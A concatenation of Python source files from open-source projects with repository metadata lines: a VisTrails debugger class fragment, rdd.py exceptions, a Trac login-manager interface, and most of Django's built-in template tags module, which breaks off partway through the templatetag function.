########################################################################
# QDebugModuleItem
class QDebugModuleItem(QtGui.QTreeWidgetItem):
"""
This class provides a unique container for adding breakpoints in a workflow
to the debugger.
"""
def __init__(self, parent=None):
QtGui.QTreeWidgetItem.__init__(self, parent)
| CMUSV-VisTrails/WorkflowRecommendation | vistrails/gui/debugger.py | Python | bsd-3-clause | 10,087 |
# -*- coding: utf-8 -*-
"""
rdd.exceptions
~~~~~~~~~~~~~~
This module contains the exceptions raised by rdd.
"""
from requests.exceptions import *
class ReadabilityException(RuntimeError):
"""Base class for Readability exceptions."""
class ShortenerError(ReadabilityException):
"""Failed to shorten URL."""
class MetadataError(ReadabilityException):
"""Failed to retrieve metadata."""
| mlafeldt/rdd.py | rdd/exceptions.py | Python | mit | 407 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Geoffrey T. Dairiki
#
"""
"""
from __future__ import absolute_import
from trac.core import Interface
class ILoginManager(Interface):
"""Store authentication state.
"""
def remember_user(req, authname):
""" Set the current user to ``authname``.
This should set a cookie, or do whatever is necessary to
remember the fact that the current user has been authenticated
as the user ``authname``.
"""
def forget_user(req):
""" Forget the current user.
This logs the current user out.
"""
| trac-hacks/trac-oidc | trac_oidc/api.py | Python | bsd-3-clause | 614 |
"""Default tags used by the template system, available to all templates."""
from __future__ import unicode_literals
import sys
import re
from datetime import datetime
from itertools import groupby, cycle as itertools_cycle
import warnings
from django.conf import settings
from django.template.base import (Node, NodeList, Template, Context, Library,
TemplateSyntaxError, VariableDoesNotExist, InvalidTemplateLibrary,
BLOCK_TAG_START, BLOCK_TAG_END, VARIABLE_TAG_START, VARIABLE_TAG_END,
SINGLE_BRACE_START, SINGLE_BRACE_END, COMMENT_TAG_START, COMMENT_TAG_END,
VARIABLE_ATTRIBUTE_SEPARATOR, get_library, token_kwargs, kwarg_re,
render_value_in_context)
from django.template.smartif import IfParser, Literal
from django.template.defaultfilters import date
from django.utils.encoding import smart_text
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils import six
from django.utils import timezone
register = Library()
class AutoEscapeControlNode(Node):
"""Implements the actions of the autoescape tag."""
def __init__(self, setting, nodelist):
self.setting, self.nodelist = setting, nodelist
def render(self, context):
old_setting = context.autoescape
context.autoescape = self.setting
output = self.nodelist.render(context)
context.autoescape = old_setting
if self.setting:
return mark_safe(output)
else:
return output
class CommentNode(Node):
def render(self, context):
return ''
class CsrfTokenNode(Node):
def render(self, context):
csrf_token = context.get('csrf_token', None)
if csrf_token:
if csrf_token == 'NOTPROVIDED':
return format_html("")
else:
return format_html("<input type='hidden' name='csrfmiddlewaretoken' value='{0}' />", csrf_token)
else:
# It's very probable that the token is missing because of
# misconfiguration, so we raise a warning
from django.conf import settings
if settings.DEBUG:
warnings.warn("A {% csrf_token %} was used in a template, but the context did not provide the value. This is usually caused by not using RequestContext.")
return ''
class CycleNode(Node):
def __init__(self, cyclevars, variable_name=None, silent=False, escape=False):
self.cyclevars = cyclevars
self.variable_name = variable_name
self.silent = silent
self.escape = escape # only while the "future" version exists
def render(self, context):
if self not in context.render_context:
# First time the node is rendered in template
context.render_context[self] = itertools_cycle(self.cyclevars)
cycle_iter = context.render_context[self]
value = next(cycle_iter).resolve(context)
if self.variable_name:
context[self.variable_name] = value
if self.silent:
return ''
if not self.escape:
value = mark_safe(value)
return render_value_in_context(value, context)
class DebugNode(Node):
def render(self, context):
from pprint import pformat
output = [pformat(val) for val in context]
output.append('\n\n')
output.append(pformat(sys.modules))
return ''.join(output)
class FilterNode(Node):
def __init__(self, filter_expr, nodelist):
self.filter_expr, self.nodelist = filter_expr, nodelist
def render(self, context):
output = self.nodelist.render(context)
# Apply filters.
context.update({'var': output})
filtered = self.filter_expr.resolve(context)
context.pop()
return filtered
class FirstOfNode(Node):
def __init__(self, variables, escape=False):
self.vars = variables
self.escape = escape # only while the "future" version exists
def render(self, context):
for var in self.vars:
value = var.resolve(context, True)
if value:
if not self.escape:
value = mark_safe(value)
return render_value_in_context(value, context)
return ''
class ForNode(Node):
child_nodelists = ('nodelist_loop', 'nodelist_empty')
def __init__(self, loopvars, sequence, is_reversed, nodelist_loop, nodelist_empty=None):
self.loopvars, self.sequence = loopvars, sequence
self.is_reversed = is_reversed
self.nodelist_loop = nodelist_loop
if nodelist_empty is None:
self.nodelist_empty = NodeList()
else:
self.nodelist_empty = nodelist_empty
def __repr__(self):
reversed_text = ' reversed' if self.is_reversed else ''
return "<For Node: for %s in %s, tail_len: %d%s>" % \
(', '.join(self.loopvars), self.sequence, len(self.nodelist_loop),
reversed_text)
def __iter__(self):
for node in self.nodelist_loop:
yield node
for node in self.nodelist_empty:
yield node
def render(self, context):
if 'forloop' in context:
parentloop = context['forloop']
else:
parentloop = {}
context.push()
try:
values = self.sequence.resolve(context, True)
except VariableDoesNotExist:
values = []
if values is None:
values = []
if not hasattr(values, '__len__'):
values = list(values)
len_values = len(values)
if len_values < 1:
context.pop()
return self.nodelist_empty.render(context)
nodelist = NodeList()
if self.is_reversed:
values = reversed(values)
unpack = len(self.loopvars) > 1
# Create a forloop value in the context. We'll update counters on each
# iteration just below.
loop_dict = context['forloop'] = {'parentloop': parentloop}
for i, item in enumerate(values):
# Shortcuts for current loop iteration number.
loop_dict['counter0'] = i
loop_dict['counter'] = i+1
# Reverse counter iteration numbers.
loop_dict['revcounter'] = len_values - i
loop_dict['revcounter0'] = len_values - i - 1
# Boolean values designating first and last times through loop.
loop_dict['first'] = (i == 0)
loop_dict['last'] = (i == len_values - 1)
pop_context = False
if unpack:
# If there are multiple loop variables, unpack the item into
# them.
try:
unpacked_vars = dict(zip(self.loopvars, item))
except TypeError:
pass
else:
pop_context = True
context.update(unpacked_vars)
else:
context[self.loopvars[0]] = item
# In TEMPLATE_DEBUG mode provide source of the node which
# actually raised the exception
if settings.TEMPLATE_DEBUG:
for node in self.nodelist_loop:
try:
nodelist.append(node.render(context))
except Exception as e:
if not hasattr(e, 'django_template_source'):
e.django_template_source = node.source
raise
else:
for node in self.nodelist_loop:
nodelist.append(node.render(context))
if pop_context:
# The loop variables were pushed on to the context so pop them
# off again. This is necessary because the tag lets the length
# of loopvars differ to the length of each set of items and we
# don't want to leave any vars from the previous loop on the
# context.
context.pop()
context.pop()
return nodelist.render(context)
class IfChangedNode(Node):
child_nodelists = ('nodelist_true', 'nodelist_false')
def __init__(self, nodelist_true, nodelist_false, *varlist):
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self._varlist = varlist
def render(self, context):
# Init state storage
state_frame = self._get_context_stack_frame(context)
if self not in state_frame:
state_frame[self] = None
nodelist_true_output = None
try:
if self._varlist:
# Consider multiple parameters. This automatically behaves
# like an OR evaluation of the multiple variables.
compare_to = [var.resolve(context, True) for var in self._varlist]
else:
# The "{% ifchanged %}" syntax (without any variables) compares the rendered output.
compare_to = nodelist_true_output = self.nodelist_true.render(context)
except VariableDoesNotExist:
compare_to = None
if compare_to != state_frame[self]:
state_frame[self] = compare_to
return nodelist_true_output or self.nodelist_true.render(context) # render true block if not already rendered
elif self.nodelist_false:
return self.nodelist_false.render(context)
return ''
def _get_context_stack_frame(self, context):
# The Context object behaves like a stack where each template tag can create a new scope.
# Find the place where to store the state to detect changes.
if 'forloop' in context:
# Ifchanged is bound to the local for loop.
# When there is a loop-in-loop, the state is bound to the inner loop,
# so it resets when the outer loop continues.
return context['forloop']
else:
# Using ifchanged outside loops. Effectively this is a no-op because the state is associated with 'self'.
return context.render_context
class IfEqualNode(Node):
child_nodelists = ('nodelist_true', 'nodelist_false')
def __init__(self, var1, var2, nodelist_true, nodelist_false, negate):
self.var1, self.var2 = var1, var2
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self.negate = negate
def __repr__(self):
return "<IfEqualNode>"
def render(self, context):
val1 = self.var1.resolve(context, True)
val2 = self.var2.resolve(context, True)
if (self.negate and val1 != val2) or (not self.negate and val1 == val2):
return self.nodelist_true.render(context)
return self.nodelist_false.render(context)
class IfNode(Node):
def __init__(self, conditions_nodelists):
self.conditions_nodelists = conditions_nodelists
def __repr__(self):
return "<IfNode>"
def __iter__(self):
for _, nodelist in self.conditions_nodelists:
for node in nodelist:
yield node
@property
def nodelist(self):
return NodeList(node for _, nodelist in self.conditions_nodelists for node in nodelist)
def render(self, context):
for condition, nodelist in self.conditions_nodelists:
if condition is not None: # if / elif clause
try:
match = condition.eval(context)
except VariableDoesNotExist:
match = None
else: # else clause
match = True
if match:
return nodelist.render(context)
return ''
class RegroupNode(Node):
def __init__(self, target, expression, var_name):
self.target, self.expression = target, expression
self.var_name = var_name
def resolve_expression(self, obj, context):
# This method is called for each object in self.target. See regroup()
# for the reason why we temporarily put the object in the context.
context[self.var_name] = obj
return self.expression.resolve(context, True)
def render(self, context):
obj_list = self.target.resolve(context, True)
if obj_list == None:
# target variable wasn't found in context; fail silently.
context[self.var_name] = []
return ''
# List of dictionaries in the format:
# {'grouper': 'key', 'list': [list of contents]}.
context[self.var_name] = [
{'grouper': key, 'list': list(val)}
for key, val in
groupby(obj_list, lambda obj: self.resolve_expression(obj, context))
]
return ''
def include_is_allowed(filepath):
for root in settings.ALLOWED_INCLUDE_ROOTS:
if filepath.startswith(root):
return True
return False
class SsiNode(Node):
def __init__(self, filepath, parsed):
self.filepath = filepath
self.parsed = parsed
def render(self, context):
filepath = self.filepath.resolve(context)
if not include_is_allowed(filepath):
if settings.DEBUG:
return "[Didn't have permission to include file]"
else:
return '' # Fail silently for invalid includes.
try:
with open(filepath, 'r') as fp:
output = fp.read()
except IOError:
output = ''
if self.parsed:
try:
t = Template(output, name=filepath)
return t.render(context)
except TemplateSyntaxError as e:
if settings.DEBUG:
return "[Included template had syntax error: %s]" % e
else:
return '' # Fail silently for invalid included templates.
return output
class LoadNode(Node):
def render(self, context):
return ''
class NowNode(Node):
def __init__(self, format_string):
self.format_string = format_string
def render(self, context):
tzinfo = timezone.get_current_timezone() if settings.USE_TZ else None
return date(datetime.now(tz=tzinfo), self.format_string)
class SpacelessNode(Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
from django.utils.html import strip_spaces_between_tags
return strip_spaces_between_tags(self.nodelist.render(context).strip())
class TemplateTagNode(Node):
mapping = {'openblock': BLOCK_TAG_START,
'closeblock': BLOCK_TAG_END,
'openvariable': VARIABLE_TAG_START,
'closevariable': VARIABLE_TAG_END,
'openbrace': SINGLE_BRACE_START,
'closebrace': SINGLE_BRACE_END,
'opencomment': COMMENT_TAG_START,
'closecomment': COMMENT_TAG_END,
}
def __init__(self, tagtype):
self.tagtype = tagtype
def render(self, context):
return self.mapping.get(self.tagtype, '')
class URLNode(Node):
def __init__(self, view_name, args, kwargs, asvar):
self.view_name = view_name
self.args = args
self.kwargs = kwargs
self.asvar = asvar
def render(self, context):
from django.core.urlresolvers import reverse, NoReverseMatch
args = [arg.resolve(context) for arg in self.args]
kwargs = dict([(smart_text(k, 'ascii'), v.resolve(context))
for k, v in self.kwargs.items()])
view_name = self.view_name.resolve(context)
if not view_name:
raise NoReverseMatch("'url' requires a non-empty first argument. "
"The syntax changed in Django 1.5, see the docs.")
# Try to look up the URL twice: once given the view name, and again
# relative to what we guess is the "main" app. If they both fail,
# re-raise the NoReverseMatch unless we're using the
# {% url ... as var %} construct in which case return nothing.
url = ''
try:
url = reverse(view_name, args=args, kwargs=kwargs, current_app=context.current_app)
except NoReverseMatch:
exc_info = sys.exc_info()
if settings.SETTINGS_MODULE:
project_name = settings.SETTINGS_MODULE.split('.')[0]
try:
url = reverse(project_name + '.' + view_name,
args=args, kwargs=kwargs,
current_app=context.current_app)
except NoReverseMatch:
if self.asvar is None:
# Re-raise the original exception, not the one with
# the path relative to the project. This makes a
# better error message.
six.reraise(*exc_info)
else:
if self.asvar is None:
raise
if self.asvar:
context[self.asvar] = url
return ''
else:
return url
class VerbatimNode(Node):
def __init__(self, content):
self.content = content
def render(self, context):
return self.content
class WidthRatioNode(Node):
def __init__(self, val_expr, max_expr, max_width):
self.val_expr = val_expr
self.max_expr = max_expr
self.max_width = max_width
def render(self, context):
try:
value = self.val_expr.resolve(context)
max_value = self.max_expr.resolve(context)
max_width = int(self.max_width.resolve(context))
except VariableDoesNotExist:
return ''
except (ValueError, TypeError):
raise TemplateSyntaxError("widthratio final argument must be a number")
try:
value = float(value)
max_value = float(max_value)
ratio = (value / max_value) * max_width
except ZeroDivisionError:
return '0'
except (ValueError, TypeError):
return ''
return str(int(round(ratio)))
class WithNode(Node):
def __init__(self, var, name, nodelist, extra_context=None):
self.nodelist = nodelist
# var and name are legacy attributes, being left in case they are used
# by third-party subclasses of this Node.
self.extra_context = extra_context or {}
if name:
self.extra_context[name] = var
def __repr__(self):
return "<WithNode>"
def render(self, context):
values = dict([(key, val.resolve(context)) for key, val in
six.iteritems(self.extra_context)])
context.update(values)
output = self.nodelist.render(context)
context.pop()
return output
@register.tag
def autoescape(parser, token):
"""
Force autoescape behavior for this block.
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
args = token.contents.split()
if len(args) != 2:
raise TemplateSyntaxError("'autoescape' tag requires exactly one argument.")
arg = args[1]
if arg not in ('on', 'off'):
raise TemplateSyntaxError("'autoescape' argument should be 'on' or 'off'")
nodelist = parser.parse(('endautoescape',))
parser.delete_first_token()
return AutoEscapeControlNode((arg == 'on'), nodelist)
@register.tag
def comment(parser, token):
"""
Ignores everything between ``{% comment %}`` and ``{% endcomment %}``.
"""
parser.skip_past('endcomment')
return CommentNode()
@register.tag
def cycle(parser, token, escape=False):
"""
Cycles among the given strings each time this tag is encountered.
Within a loop, cycles among the given strings each time through
the loop::
{% for o in some_list %}
<tr class="{% cycle 'row1' 'row2' %}">
...
</tr>
{% endfor %}
Outside of a loop, give the values a unique name the first time you call
it, then use that name each sucessive time through::
<tr class="{% cycle 'row1' 'row2' 'row3' as rowcolors %}">...</tr>
<tr class="{% cycle rowcolors %}">...</tr>
<tr class="{% cycle rowcolors %}">...</tr>
You can use any number of values, separated by spaces. Commas can also
be used to separate values; if a comma is used, the cycle values are
interpreted as literal strings.
The optional flag "silent" can be used to prevent the cycle declaration
from returning any value::
{% for o in some_list %}
{% cycle 'row1' 'row2' as rowcolors silent %}
<tr class="{{ rowcolors }}">{% include "subtemplate.html " %}</tr>
{% endfor %}
"""
if not escape:
warnings.warn(
"'The `cycle` template tag is changing to escape its arguments; "
"the non-autoescaping version is deprecated. Load it "
"from the `future` tag library to start using the new behavior.",
PendingDeprecationWarning, stacklevel=2)
# Note: This returns the exact same node on each {% cycle name %} call;
# that is, the node object returned from {% cycle a b c as name %} and the
# one returned from {% cycle name %} are the exact same object. This
# shouldn't cause problems (heh), but if it does, now you know.
#
# Ugly hack warning: This stuffs the named template dict into parser so
# that names are only unique within each template (as opposed to using
# a global variable, which would make cycle names have to be unique across
# *all* templates.
args = token.split_contents()
if len(args) < 2:
raise TemplateSyntaxError("'cycle' tag requires at least two arguments")
if ',' in args[1]:
# Backwards compatibility: {% cycle a,b %} or {% cycle a,b as foo %}
# case.
args[1:2] = ['"%s"' % arg for arg in args[1].split(",")]
if len(args) == 2:
# {% cycle foo %} case.
name = args[1]
if not hasattr(parser, '_namedCycleNodes'):
raise TemplateSyntaxError("No named cycles in template. '%s' is not defined" % name)
if not name in parser._namedCycleNodes:
raise TemplateSyntaxError("Named cycle '%s' does not exist" % name)
return parser._namedCycleNodes[name]
as_form = False
if len(args) > 4:
# {% cycle ... as foo [silent] %} case.
if args[-3] == "as":
if args[-1] != "silent":
raise TemplateSyntaxError("Only 'silent' flag is allowed after cycle's name, not '%s'." % args[-1])
as_form = True
silent = True
args = args[:-1]
elif args[-2] == "as":
as_form = True
silent = False
if as_form:
name = args[-1]
values = [parser.compile_filter(arg) for arg in args[1:-2]]
node = CycleNode(values, name, silent=silent, escape=escape)
if not hasattr(parser, '_namedCycleNodes'):
parser._namedCycleNodes = {}
parser._namedCycleNodes[name] = node
else:
values = [parser.compile_filter(arg) for arg in args[1:]]
node = CycleNode(values, escape=escape)
return node
@register.tag
def csrf_token(parser, token):
return CsrfTokenNode()
@register.tag
def debug(parser, token):
"""
Outputs a whole load of debugging information, including the current
context and imported modules.
Sample usage::
<pre>
{% debug %}
</pre>
"""
return DebugNode()
@register.tag('filter')
def do_filter(parser, token):
"""
Filters the contents of the block through variable filters.
Filters can also be piped through each other, and they can have
arguments -- just like in variable syntax.
Sample usage::
{% filter force_escape|lower %}
This text will be HTML-escaped, and will appear in lowercase.
{% endfilter %}
Note that the ``escape`` and ``safe`` filters are not acceptable arguments.
Instead, use the ``autoescape`` tag to manage autoescaping for blocks of
template code.
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
_, rest = token.contents.split(None, 1)
filter_expr = parser.compile_filter("var|%s" % (rest))
for func, unused in filter_expr.filters:
if getattr(func, '_decorated_function', func).__name__ in ('escape', 'safe'):
raise TemplateSyntaxError('"filter %s" is not permitted. Use the "autoescape" tag instead.' % func.__name__)
nodelist = parser.parse(('endfilter',))
parser.delete_first_token()
return FilterNode(filter_expr, nodelist)
@register.tag
def firstof(parser, token, escape=False):
"""
Outputs the first variable passed that is not False, without escaping.
Outputs nothing if all the passed variables are False.
Sample usage::
{% firstof var1 var2 var3 %}
This is equivalent to::
{% if var1 %}
{{ var1|safe }}
{% elif var2 %}
{{ var2|safe }}
{% elif var3 %}
{{ var3|safe }}
{% endif %}
but obviously much cleaner!
You can also use a literal string as a fallback value in case all
passed variables are False::
{% firstof var1 var2 var3 "fallback value" %}
If you want to escape the output, use a filter tag::
{% filter force_escape %}
{% firstof var1 var2 var3 "fallback value" %}
{% endfilter %}
"""
if not escape:
warnings.warn(
"'The `firstof` template tag is changing to escape its arguments; "
"the non-autoescaping version is deprecated. Load it "
"from the `future` tag library to start using the new behavior.",
PendingDeprecationWarning, stacklevel=2)
bits = token.split_contents()[1:]
if len(bits) < 1:
raise TemplateSyntaxError("'firstof' statement requires at least one argument")
return FirstOfNode([parser.compile_filter(bit) for bit in bits], escape=escape)
@register.tag('for')
def do_for(parser, token):
"""
Loops over each item in an array.
For example, to display a list of athletes given ``athlete_list``::
<ul>
{% for athlete in athlete_list %}
<li>{{ athlete.name }}</li>
{% endfor %}
</ul>
You can loop over a list in reverse by using
``{% for obj in list reversed %}``.
You can also unpack multiple values from a two-dimensional array::
{% for key,value in dict.items %}
{{ key }}: {{ value }}
{% endfor %}
The ``for`` tag can take an optional ``{% empty %}`` clause that will
be displayed if the given array is empty or could not be found::
<ul>
{% for athlete in athlete_list %}
<li>{{ athlete.name }}</li>
{% empty %}
<li>Sorry, no athletes in this list.</li>
{% endfor %}
<ul>
The above is equivalent to -- but shorter, cleaner, and possibly faster
than -- the following::
<ul>
{% if althete_list %}
{% for athlete in athlete_list %}
<li>{{ athlete.name }}</li>
{% endfor %}
{% else %}
<li>Sorry, no athletes in this list.</li>
{% endif %}
</ul>
The for loop sets a number of variables available within the loop:
========================== ================================================
Variable Description
========================== ================================================
``forloop.counter`` The current iteration of the loop (1-indexed)
``forloop.counter0`` The current iteration of the loop (0-indexed)
``forloop.revcounter`` The number of iterations from the end of the
loop (1-indexed)
``forloop.revcounter0`` The number of iterations from the end of the
loop (0-indexed)
``forloop.first`` True if this is the first time through the loop
``forloop.last`` True if this is the last time through the loop
``forloop.parentloop`` For nested loops, this is the loop "above" the
current one
========================== ================================================
"""
bits = token.split_contents()
if len(bits) < 4:
raise TemplateSyntaxError("'for' statements should have at least four"
" words: %s" % token.contents)
is_reversed = bits[-1] == 'reversed'
in_index = -3 if is_reversed else -2
if bits[in_index] != 'in':
raise TemplateSyntaxError("'for' statements should use the format"
" 'for x in y': %s" % token.contents)
loopvars = re.split(r' *, *', ' '.join(bits[1:in_index]))
for var in loopvars:
if not var or ' ' in var:
raise TemplateSyntaxError("'for' tag received an invalid argument:"
" %s" % token.contents)
sequence = parser.compile_filter(bits[in_index+1])
nodelist_loop = parser.parse(('empty', 'endfor',))
token = parser.next_token()
if token.contents == 'empty':
nodelist_empty = parser.parse(('endfor',))
parser.delete_first_token()
else:
nodelist_empty = None
return ForNode(loopvars, sequence, is_reversed, nodelist_loop, nodelist_empty)
def do_ifequal(parser, token, negate):
bits = list(token.split_contents())
if len(bits) != 3:
raise TemplateSyntaxError("%r takes two arguments" % bits[0])
end_tag = 'end' + bits[0]
nodelist_true = parser.parse(('else', end_tag))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse((end_tag,))
parser.delete_first_token()
else:
nodelist_false = NodeList()
val1 = parser.compile_filter(bits[1])
val2 = parser.compile_filter(bits[2])
return IfEqualNode(val1, val2, nodelist_true, nodelist_false, negate)
@register.tag
def ifequal(parser, token):
"""
Outputs the contents of the block if the two arguments equal each other.
Examples::
{% ifequal user.id comment.user_id %}
...
{% endifequal %}
{% ifnotequal user.id comment.user_id %}
...
{% else %}
...
{% endifnotequal %}
"""
return do_ifequal(parser, token, False)
@register.tag
def ifnotequal(parser, token):
"""
Outputs the contents of the block if the two arguments are not equal.
See ifequal.
"""
return do_ifequal(parser, token, True)
class TemplateLiteral(Literal):
def __init__(self, value, text):
self.value = value
self.text = text # for better error messages
def display(self):
return self.text
def eval(self, context):
return self.value.resolve(context, ignore_failures=True)
class TemplateIfParser(IfParser):
error_class = TemplateSyntaxError
def __init__(self, parser, *args, **kwargs):
self.template_parser = parser
super(TemplateIfParser, self).__init__(*args, **kwargs)
def create_var(self, value):
return TemplateLiteral(self.template_parser.compile_filter(value), value)
@register.tag('if')
def do_if(parser, token):
"""
The ``{% if %}`` tag evaluates a variable, and if that variable is "true"
(i.e., exists, is not empty, and is not a false boolean value), the
contents of the block are output:
::
{% if athlete_list %}
Number of athletes: {{ athlete_list|count }}
{% elif athlete_in_locker_room_list %}
Athletes should be out of the locker room soon!
{% else %}
No athletes.
{% endif %}
In the above, if ``athlete_list`` is not empty, the number of athletes will
be displayed by the ``{{ athlete_list|count }}`` variable.
As you can see, the ``if`` tag may take one or several `` {% elif %}``
clauses, as well as an ``{% else %}`` clause that will be displayed if all
previous conditions fail. These clauses are optional.
``if`` tags may use ``or``, ``and`` or ``not`` to test a number of
variables or to negate a given variable::
{% if not athlete_list %}
There are no athletes.
{% endif %}
{% if athlete_list or coach_list %}
There are some athletes or some coaches.
{% endif %}
{% if athlete_list and coach_list %}
Both atheletes and coaches are available.
{% endif %}
{% if not athlete_list or coach_list %}
There are no athletes, or there are some coaches.
{% endif %}
{% if athlete_list and not coach_list %}
There are some athletes and absolutely no coaches.
{% endif %}
Comparison operators are also available, and the use of filters is also
allowed, for example::
{% if articles|length >= 5 %}...{% endif %}
Arguments and operators _must_ have a space between them, so
``{% if 1>2 %}`` is not a valid if tag.
All supported operators are: ``or``, ``and``, ``in``, ``not in``
``==`` (or ``=``), ``!=``, ``>``, ``>=``, ``<`` and ``<=``.
Operator precedence follows Python.
"""
# {% if ... %}
bits = token.split_contents()[1:]
condition = TemplateIfParser(parser, bits).parse()
nodelist = parser.parse(('elif', 'else', 'endif'))
conditions_nodelists = [(condition, nodelist)]
token = parser.next_token()
# {% elif ... %} (repeatable)
while token.contents.startswith('elif'):
bits = token.split_contents()[1:]
condition = TemplateIfParser(parser, bits).parse()
nodelist = parser.parse(('elif', 'else', 'endif'))
conditions_nodelists.append((condition, nodelist))
token = parser.next_token()
# {% else %} (optional)
if token.contents == 'else':
nodelist = parser.parse(('endif',))
conditions_nodelists.append((None, nodelist))
token = parser.next_token()
# {% endif %}
assert token.contents == 'endif'
return IfNode(conditions_nodelists)
@register.tag
def ifchanged(parser, token):
"""
Checks if a value has changed from the last iteration of a loop.
The ``{% ifchanged %}`` block tag is used within a loop. It has two
possible uses.
1. Checks its own rendered contents against its previous state and only
displays the content if it has changed. For example, this displays a
list of days, only displaying the month if it changes::
<h1>Archive for {{ year }}</h1>
{% for date in days %}
{% ifchanged %}<h3>{{ date|date:"F" }}</h3>{% endifchanged %}
<a href="{{ date|date:"M/d"|lower }}/">{{ date|date:"j" }}</a>
{% endfor %}
2. If given one or more variables, check whether any variable has changed.
For example, the following shows the date every time it changes, while
showing the hour if either the hour or the date has changed::
{% for date in days %}
{% ifchanged date.date %} {{ date.date }} {% endifchanged %}
{% ifchanged date.hour date.date %}
{{ date.hour }}
{% endifchanged %}
{% endfor %}
"""
bits = token.split_contents()
nodelist_true = parser.parse(('else', 'endifchanged'))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse(('endifchanged',))
parser.delete_first_token()
else:
nodelist_false = NodeList()
values = [parser.compile_filter(bit) for bit in bits[1:]]
return IfChangedNode(nodelist_true, nodelist_false, *values)
@register.tag
def ssi(parser, token):
"""
Outputs the contents of a given file into the page.
Like a simple "include" tag, the ``ssi`` tag includes the contents
of another file -- which must be specified using an absolute path --
in the current page::
{% ssi "/home/html/ljworld.com/includes/right_generic.html" %}
If the optional "parsed" parameter is given, the contents of the included
file are evaluated as template code, with the current context::
{% ssi "/home/html/ljworld.com/includes/right_generic.html" parsed %}
"""
bits = token.split_contents()
parsed = False
if len(bits) not in (2, 3):
raise TemplateSyntaxError("'ssi' tag takes one argument: the path to"
" the file to be included")
if len(bits) == 3:
if bits[2] == 'parsed':
parsed = True
else:
raise TemplateSyntaxError("Second (optional) argument to %s tag"
" must be 'parsed'" % bits[0])
filepath = parser.compile_filter(bits[1])
return SsiNode(filepath, parsed)
@register.tag
def load(parser, token):
"""
Loads a custom template tag set.
For example, to load the template tags in
``django/templatetags/news/photos.py``::
{% load news.photos %}
Can also be used to load an individual tag/filter from
a library::
{% load byline from news %}
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
bits = token.contents.split()
if len(bits) >= 4 and bits[-2] == "from":
try:
taglib = bits[-1]
lib = get_library(taglib)
except InvalidTemplateLibrary as e:
raise TemplateSyntaxError("'%s' is not a valid tag library: %s" %
(taglib, e))
else:
temp_lib = Library()
for name in bits[1:-2]:
if name in lib.tags:
temp_lib.tags[name] = lib.tags[name]
# a name could be a tag *and* a filter, so check for both
if name in lib.filters:
temp_lib.filters[name] = lib.filters[name]
elif name in lib.filters:
temp_lib.filters[name] = lib.filters[name]
else:
raise TemplateSyntaxError("'%s' is not a valid tag or filter in tag library '%s'" %
(name, taglib))
parser.add_library(temp_lib)
else:
for taglib in bits[1:]:
# add the library to the parser
try:
lib = get_library(taglib)
parser.add_library(lib)
except InvalidTemplateLibrary as e:
raise TemplateSyntaxError("'%s' is not a valid tag library: %s" %
(taglib, e))
return LoadNode()
@register.tag
def now(parser, token):
"""
Displays the date, formatted according to the given string.
Uses the same format as PHP's ``date()`` function; see http://php.net/date
for all the possible values.
Sample usage::
It is {% now "jS F Y H:i" %}
"""
bits = token.split_contents()
if len(bits) != 2:
raise TemplateSyntaxError("'now' statement takes one argument")
format_string = bits[1][1:-1]
return NowNode(format_string)
@register.tag
def regroup(parser, token):
"""
Regroups a list of alike objects by a common attribute.
This complex tag is best illustrated by use of an example: say that
``people`` is a list of ``Person`` objects that have ``first_name``,
``last_name``, and ``gender`` attributes, and you'd like to display a list
that looks like:
* Male:
* George Bush
* Bill Clinton
* Female:
* Margaret Thatcher
* Colendeeza Rice
* Unknown:
* Pat Smith
The following snippet of template code would accomplish this dubious task::
{% regroup people by gender as grouped %}
<ul>
{% for group in grouped %}
<li>{{ group.grouper }}
<ul>
{% for item in group.list %}
<li>{{ item }}</li>
{% endfor %}
</ul>
{% endfor %}
</ul>
As you can see, ``{% regroup %}`` populates a variable with a list of
objects with ``grouper`` and ``list`` attributes. ``grouper`` contains the
item that was grouped by; ``list`` contains the list of objects that share
that ``grouper``. In this case, ``grouper`` would be ``Male``, ``Female``
and ``Unknown``, and ``list`` is the list of people with those genders.
Note that ``{% regroup %}`` does not work when the list to be grouped is not
sorted by the key you are grouping by! This means that if your list of
people was not sorted by gender, you'd need to make sure it is sorted
before using it, i.e.::
{% regroup people|dictsort:"gender" by gender as grouped %}
"""
bits = token.split_contents()
if len(bits) != 6:
raise TemplateSyntaxError("'regroup' tag takes five arguments")
target = parser.compile_filter(bits[1])
if bits[2] != 'by':
raise TemplateSyntaxError("second argument to 'regroup' tag must be 'by'")
if bits[4] != 'as':
raise TemplateSyntaxError("next-to-last argument to 'regroup' tag must"
" be 'as'")
var_name = bits[5]
# RegroupNode will take each item in 'target', put it in the context under
# 'var_name', evaluate 'var_name'.'expression' in the current context, and
# group by the resulting value. After all items are processed, it will
# save the final result in the context under 'var_name', thus clearing the
# temporary values. This hack is necessary because the template engine
# doesn't provide a context-aware equivalent of Python's getattr.
expression = parser.compile_filter(var_name +
VARIABLE_ATTRIBUTE_SEPARATOR +
bits[3])
return RegroupNode(target, expression, var_name)
@register.tag
def spaceless(parser, token):
"""
Removes whitespace between HTML tags, including tab and newline characters.
Example usage::
{% spaceless %}
<p>
<a href="foo/">Foo</a>
</p>
{% endspaceless %}
This example would return this HTML::
<p><a href="foo/">Foo</a></p>
Only space between *tags* is normalized -- not space between tags and text.
In this example, the space around ``Hello`` won't be stripped::
{% spaceless %}
<strong>
Hello
</strong>
{% endspaceless %}
"""
nodelist = parser.parse(('endspaceless',))
parser.delete_first_token()
return SpacelessNode(nodelist)
@register.tag
def templatetag(parser, token):
"""
Outputs one of the bits used to compose template tags.
Since the template system has no concept of "escaping", to display one of
the bits used in template tags, you must use the ``{% templatetag %}`` tag.
The argument tells which template bit to output:
================== =======
Argument Outputs
================== =======
``openblock`` ``{%``
``closeblock`` ``%}``
``openvariable`` ``{{``
``closevariable`` ``}}``
``openbrace`` ``{``
``closebrace`` ``}``
``opencomment`` ``{#``
``closecomment`` ``#}``
================== =======
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
bits = token.contents.split()
if len(bits) != 2:
